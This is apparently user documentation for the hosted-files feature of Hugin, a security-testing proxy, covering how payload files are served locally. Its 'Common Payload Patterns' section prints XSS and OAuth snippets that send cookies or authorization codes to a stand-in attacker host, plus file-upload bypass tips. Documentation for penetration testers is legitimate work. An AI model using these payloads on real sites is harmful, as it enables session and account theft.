The Files view manages the hosted files library — static files that Hugin serves through the proxy port for payload injection. Drop a file here, and it becomes available at http://127.0.0.1:8080/hosted/<filename>.
Use it for XSS payloads, SSRF callback responses, file upload exploits, OAuth victim pages, anything that needs a fast, controllable URL during testing.
🔗How Hosting Works
When the proxy receives a request whose Host header targets the proxy itself (127.0.0.1, localhost, or [::1]) and the path starts with /hosted/, Hugin intercepts the request and serves the matching file from the hosted directory.
Requests to /hosted/ paths on external hosts pass through normally — your hosted-file URLs only resolve locally.
The hosted directory is ~/.hugin/hosted/ by default. Files added through the UI are written there; files written manually to that directory are picked up automatically.
🔗Adding Files
🔗Drag-and-Drop
Drag any file from your OS file manager into the Files view. The file is copied into the hosted directory.
🔗Add via Path
The + Add File button opens a file picker for one or more selections.
🔗Paste Text
The + New Text File button opens a text editor — pick a filename and paste content. Useful for inline payloads, OAuth landing pages, JS payloads.
🔗From Clipboard
Right-click in the table → Paste from Clipboard — creates a file from clipboard text or image content.
🔗File Operations
Per row:
- Copy URL — copies
http://127.0.0.1:8080/hosted/<filename>to clipboard - Open — opens the file in your default OS handler
- Edit — for text files, opens the inline editor
- Rename — renames in place (URL changes too)
- Delete — removes from disk
🔗MIME Types
Hugin guesses MIME from extension. Common types are mapped correctly:
.html→text/html.js→application/javascript.svg→image/svg+xml.json→application/json.xml→text/xml.txt→text/plain- Binary fallback →
application/octet-stream
To override, edit the file’s metadata sidecar (per-file .json next to the file in the hosted directory).
🔗Common Payload Patterns
🔗Stored XSS callback
xss.html:
<script>fetch('https://attacker.example.com/x?c='+document.cookie)</script>URL: http://127.0.0.1:8080/hosted/xss.html. Inject this URL anywhere the target loads HTML (e.g., as iframe src).
🔗SVG XSS
x.svg:
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>Served with image/svg+xml MIME — bypasses many image-only filters.
🔗File upload bypass payloads
Drop a polyglot GIF/PHP, double-extension files, or null-byte filename variants into the hosted dir; right-click → Copy URL for use as upload sources.
🔗OAuth victim page
victim.html:
<script>
const code = new URLSearchParams(window.location.search).get('code');
fetch('https://attacker.example.com/exfil?code=' + code);
</script>Use as a victim page in OAuth redirect_uri injection PoCs.
🔗Security
- The
/hosted/route is only intercepted when the request targets the proxy itself. Requests to external sites at/hosted/paths pass through unmodified — so hostingxss.htmldoesn’t accidentally serve it fromtarget.com/hosted/xss.html. - The hosted dir is not exposed via the API server (port 8081). Only the proxy port serves these files.
- File contents are not scanned — the hosted dir is a payload library, treat it accordingly.
🔗Search & Tags
The Files table supports search by filename and tagging for organisation. Common tags: xss, ssrf, upload, oauth, client-acme.
🔗Related
- The
[storage]config section controls the hosted directory path (configurable viaHUGIN_HOME). - The proxy chapter has a brief mention of
/hosted/*interception under Hosted Files. - For dynamic / scripted responses, use a Lua extension instead — extensions can synthesise responses from request context, hosted files cannot.